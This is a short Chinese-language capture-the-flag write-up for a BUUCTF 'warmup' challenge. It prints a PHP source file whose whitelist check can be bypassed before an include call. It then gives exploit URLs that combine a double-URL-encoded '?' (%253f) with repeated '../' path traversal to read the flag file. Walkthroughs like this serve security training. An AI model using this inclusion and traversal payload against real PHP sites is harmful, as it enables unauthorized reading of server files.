进去只看到一个滑稽表情,然后打开网页源代码可以看到source.php
然后访问。
打开后是php代码审计。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49
| ![warmup3](C:\Users\hacke\Desktop\buuctf\warmup3.PNG) <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; }
if (in_array($page, $whitelist)) { return true; }
$_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; }
$_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } }
if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />"; } ?>
|
从 $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
可以看出还有一个hint.php
的网页,打开后看到flag不在这,在ffffllllaaaagggg里面。
看到这里,我们已经知到该怎么做了,但是有一点,我们并不知道ffffllllaaaagggg在哪。
http://xxx.xxx.xxx/source.php?file=source.php%253f../ffffllllaaaagggg
看到并没有回显,然后我们就一直加../
直到返回flag。
http://xxx.xxx.xxx/source.php?file=source.php%253f../../../../../ffffllllaaaagggg